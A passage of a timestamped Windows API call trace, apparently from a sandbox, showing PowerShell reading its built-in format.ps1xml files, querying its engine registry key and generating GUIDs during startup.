lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.347] GetLastError () returned 0xcb [0029.347] SetErrorMode (uMode=0x1) returned 0x1 [0029.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0029.348] GetLastError () returned 0xcb [0029.348] SetErrorMode (uMode=0x1) returned 0x1 [0029.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.348] GetLastError () returned 0xcb [0029.348] SetErrorMode (uMode=0x1) returned 0x1 [0029.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0029.348] GetLastError () returned 0xcb [0029.348] SetErrorMode (uMode=0x1) returned 0x1 [0029.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.348] GetLastError () returned 0xcb [0029.348] SetErrorMode (uMode=0x1) returned 0x1 [0029.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e838 | out: lpFileInformation=0x24e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0029.348] GetLastError () returned 0xcb [0029.348] SetErrorMode (uMode=0x1) returned 0x1 [0029.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.349] GetLastError () returned 0xcb [0029.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.355] GetLastError () returned 0xcb [0029.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.356] GetLastError () returned 0xcb [0029.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.357] GetLastError () returned 0xcb [0029.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.357] GetLastError () returned 0xcb [0029.357] SetErrorMode (uMode=0x1) returned 0x1 [0029.357] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.357] GetLastError () returned 0x0 [0029.358] GetFileType (hFile=0x300) returned 0x1 [0029.358] SetErrorMode (uMode=0x1) returned 0x1 [0029.358] GetFileType (hFile=0x300) returned 0x1 [0029.358] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.360] GetLastError () returned 0x0 [0029.361] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.361] GetLastError () returned 0x0 [0029.361] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.361] GetLastError () returned 0x0 [0029.361] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.361] GetLastError () returned 0x0 [0029.362] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x9e2, lpOverlapped=0x0) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] ReadFile (in: hFile=0x300, lpBuffer=0x23a07f2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a07f2*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] ReadFile (in: hFile=0x300, lpBuffer=0x23a1270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23a1270*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] CloseHandle (hObject=0x300) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.362] GetLastError () returned 0x0 [0029.362] SetErrorMode (uMode=0x1) returned 0x1 [0029.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23b232c | out: lpFileInformation=0x23b232c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0029.362] GetLastError () returned 0x0 [0029.362] SetErrorMode (uMode=0x1) returned 0x1 [0029.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.362] GetLastError () returned 0x0 [0029.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.362] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.362] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.363] RegCloseKey (hKey=0x300) returned 0x0 [0029.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.363] GetLastError () returned 0x0 [0029.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.363] GetLastError () returned 0x0 [0029.375] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x8ca35d64, Data2=0xf705, Data3=0x4fc7, Data4=([0]=0xbd, [1]=0x10, [2]=0xb6, [3]=0x1b, [4]=0x2b, [5]=0xa6, [6]=0x99, [7]=0x2f))) returned 0x0 [0029.386] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x6209454f, Data2=0xe5a7, Data3=0x47e3, Data4=([0]=0x91, [1]=0xb4, [2]=0x2b, [3]=0x52, [4]=0x49, [5]=0x81, [6]=0x37, [7]=0x28))) returned 0x0 [0029.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.387] GetLastError () returned 0x0 [0029.387] SetErrorMode (uMode=0x1) returned 0x1 [0029.387] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.387] GetLastError () returned 0x0 [0029.387] GetFileType (hFile=0x300) returned 0x1 [0029.387] SetErrorMode (uMode=0x1) returned 0x1 [0029.387] GetFileType (hFile=0x300) returned 0x1 [0029.387] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.389] GetLastError () returned 0x0 [0029.389] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.389] GetLastError () returned 0x0 [0029.390] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.390] GetLastError () returned 0x0 [0029.390] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.390] GetLastError () returned 0x0 [0029.390] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.390] GetLastError () returned 0x0 [0029.391] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0xfb2, lpOverlapped=0x0) returned 1 [0029.391] GetLastError () returned 0x0 [0029.391] ReadFile (in: hFile=0x300, lpBuffer=0x23c4d66, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c4d66*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.391] GetLastError () returned 0x0 [0029.391] ReadFile (in: hFile=0x300, lpBuffer=0x23c5614, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x23c5614*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.391] GetLastError () returned 0x0 [0029.391] CloseHandle (hObject=0x300) returned 1 [0029.392] GetLastError () returned 0x0 [0029.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.392] GetLastError () returned 0x0 [0029.392] SetErrorMode (uMode=0x1) returned 0x1 [0029.392] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e5ea4 | out: lpFileInformation=0x23e5ea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0029.392] GetLastError () returned 0x0 [0029.392] SetErrorMode (uMode=0x1) returned 0x1 [0029.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.392] GetLastError () returned 0x0 [0029.392] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.392] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.392] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.392] RegCloseKey (hKey=0x300) returned 0x0 [0029.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.392] GetLastError () returned 0x0 [0029.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0029.392] GetLastError () returned 0x0 [0029.394] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2cd4603a, Data2=0x6031, Data3=0x4098, Data4=([0]=0x88, [1]=0x25, [2]=0xe2, [3]=0x2d, [4]=0x59, [5]=0xd5, [6]=0xb2, [7]=0x7d))) returned 0x0 [0029.395] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x1427cb4c, Data2=0x82f5, Data3=0x4056, Data4=([0]=0x83, [1]=0xfa, [2]=0x1d, [3]=0x72, [4]=0x3f, [5]=0x44, [6]=0x81, [7]=0x51))) returned 0x0 [0029.396] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x7a5821de, Data2=0x29ff, Data3=0x4e15, Data4=([0]=0x85, [1]=0x75, [2]=0x29, [3]=0x7, [4]=0xbf, [5]=0x8b, [6]=0x7d, [7]=0x25))) returned 0x0 [0029.396] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x706a973a, Data2=0x5eb, Data3=0x4c32, Data4=([0]=0xba, [1]=0xf, [2]=0x5e, [3]=0x91, [4]=0x5d, [5]=0x5, [6]=0xb9, [7]=0xf2))) returned 0x0 [0029.396] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x9f2a4130, Data2=0x9fd0, Data3=0x434e, Data4=([0]=0xbc, [1]=0xca, [2]=0x2d, [3]=0x90, [4]=0xa5, [5]=0x9c, [6]=0x94, [7]=0x8e))) returned 0x0 [0029.397] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xd8c19d76, Data2=0x42d4, Data3=0x4f5d, Data4=([0]=0xbc, [1]=0x54, [2]=0xd3, [3]=0xe9, [4]=0x14, [5]=0x87, [6]=0x5b, [7]=0x5f))) returned 0x0 [0029.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.397] GetLastError () returned 0x0 [0029.397] SetErrorMode (uMode=0x1) returned 0x1 [0029.397] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.397] GetLastError () returned 0x0 [0029.397] GetFileType (hFile=0x300) returned 0x1 [0029.397] SetErrorMode (uMode=0x1) returned 0x1 [0029.397] GetFileType (hFile=0x300) returned 0x1 [0029.397] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.399] GetLastError () returned 0x0 [0029.399] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.399] GetLastError () returned 0x0 [0029.400] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.400] GetLastError () returned 0x0 [0029.400] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.400] GetLastError () returned 0x0 [0029.401] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0xaca, lpOverlapped=0x0) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] ReadFile (in: hFile=0x300, lpBuffer=0x2404eb6, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2404eb6*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] ReadFile (in: hFile=0x300, lpBuffer=0x240584c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x240584c*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] CloseHandle (hObject=0x300) returned 1 [0029.401] GetLastError () returned 0x0 [0029.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.401] GetLastError () returned 0x0 [0029.401] SetErrorMode (uMode=0x1) returned 0x1 [0029.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2426848 | out: lpFileInformation=0x2426848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0029.402] GetLastError () returned 0x0 [0029.402] SetErrorMode (uMode=0x1) returned 0x1 [0029.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.402] GetLastError () returned 0x0 [0029.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.402] RegCloseKey (hKey=0x300) returned 0x0 [0029.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.402] GetLastError () returned 0x0 [0029.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.402] GetLastError () returned 0x0 [0029.406] 